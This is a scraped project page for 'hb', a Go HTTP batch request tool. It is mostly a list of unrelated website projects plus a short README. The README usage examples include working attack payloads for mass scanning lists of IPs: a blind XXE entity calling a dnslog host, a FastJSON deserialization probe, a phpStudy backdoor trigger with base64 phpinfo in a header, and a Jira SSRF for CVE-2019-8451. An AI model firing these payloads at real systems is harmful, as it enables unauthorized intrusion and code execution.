All Projects → c26root → Hb

c26root / Hb

Fast http batch request tool

Programming Languages

go
31211 projects - #10 most used programming language

Projects that are alternatives of or similar to Hb

Ascii Generator.site
Django website for generating ASCII-arts out of images or text 🎨
Stars: ✭ 77 (-20.62%)
Mutual labels:  website
Popcorn Site
Website EXPRESS.js + I18next
Stars: ✭ 84 (-13.4%)
Mutual labels:  website
Job Web Demo
Python Web 实战项目,Flask + Jinja2 + Bootstrap 开发的招聘网站
Stars: ✭ 87 (-10.31%)
Mutual labels:  website
Swiftlinkpreview
It makes a preview from an URL, grabbing all the information such as title, relevant texts and images.
Stars: ✭ 1,216 (+1153.61%)
Mutual labels:  website
Binari
Interactive code editor with a live binary tree visual designed to teach new developers the fundamentals of dynamic programming.
Stars: ✭ 82 (-15.46%)
Mutual labels:  website
Elementsproject.org
Source code for the ElementsProject.org website
Stars: ✭ 84 (-13.4%)
Mutual labels:  website
Site Webdev
Source for webdev.dartlang.org
Stars: ✭ 76 (-21.65%)
Mutual labels:  website
Next Offline
make your Next.js application work offline using service workers via Google's workbox
Stars: ✭ 1,306 (+1246.39%)
Mutual labels:  website
Blog
Source for my blazing fast blog
Stars: ✭ 83 (-14.43%)
Mutual labels:  website
30days30submits
This is a challenge that I took to boost my HTML, CSS & JS skills. I made 30 submits and they are basically some little components or js apps.
Stars: ✭ 87 (-10.31%)
Mutual labels:  website
Apis
This Repository contains link to many Open or Closed Source APIs which I've made
Stars: ✭ 79 (-18.56%)
Mutual labels:  website
Quizzity
A fast-paced geography quiz
Stars: ✭ 80 (-17.53%)
Mutual labels:  website
Wagtail Torchbox
Wagtail build of Torchbox.com
Stars: ✭ 84 (-13.4%)
Mutual labels:  website
Qbittorrent Website
qBittorrent website
Stars: ✭ 77 (-20.62%)
Mutual labels:  website
Snapcraft.io
Stars: ✭ 87 (-10.31%)
Mutual labels:  website
Linuxcontainers.org
The linuxcontainers.org website
Stars: ✭ 76 (-21.65%)
Mutual labels:  website
Code Cookbook
The Haxe Code Cookbook - A community driven resource website for learning Haxe in practise
Stars: ✭ 84 (-13.4%)
Mutual labels:  website
Thanks
The first version of thanks.rust-lang.org, succeeded by rust-lang/thanks
Stars: ✭ 96 (-1.03%)
Mutual labels:  website
Openjdk Website
Website source
Stars: ✭ 86 (-11.34%)
Mutual labels:  website
Minetest.github.io
Official Minetest website hosted by Github Pages
Stars: ✭ 85 (-12.37%)
Mutual labels:  website

hb

Fast http batch request tool

Installing

bash build.sh

Example

Load File Target

./hb -f ips.txt -p 80

Add HTTP Header

-H "Host: bypasscdn"

Show ProgressBar

-pg

Follow redirect (30x)

-redirect

Filter Response Body

-grep "admin"

Filter Response Header (X-Powered-By ContentType Title)

-filter "nginx"

Filter Response Status Code

-code 2 # 2xx

Show Resposne Body

-response

Shuffle Request

-random

Send Post Request

-body "a=1&b=2&c=2"

# post body from file
-bodyfile ./exploit

Send PUT Request

-method PUT

Show Request Error

-debug 

Elasticsearch

-p 9200 -path "/_cat" -grep "/_cat/allocation"

PHPINF0

-path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'

XXE Blind

-body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace

FastJSON Blind

-H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect

Weblogic fingerprint

-p 7001 -H "Authorization: Basic" -code 401

phpStudy Backdoor

-H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -grep 'PHP Version' -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect

CVE-2019-8451 Jira SSRF

-path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].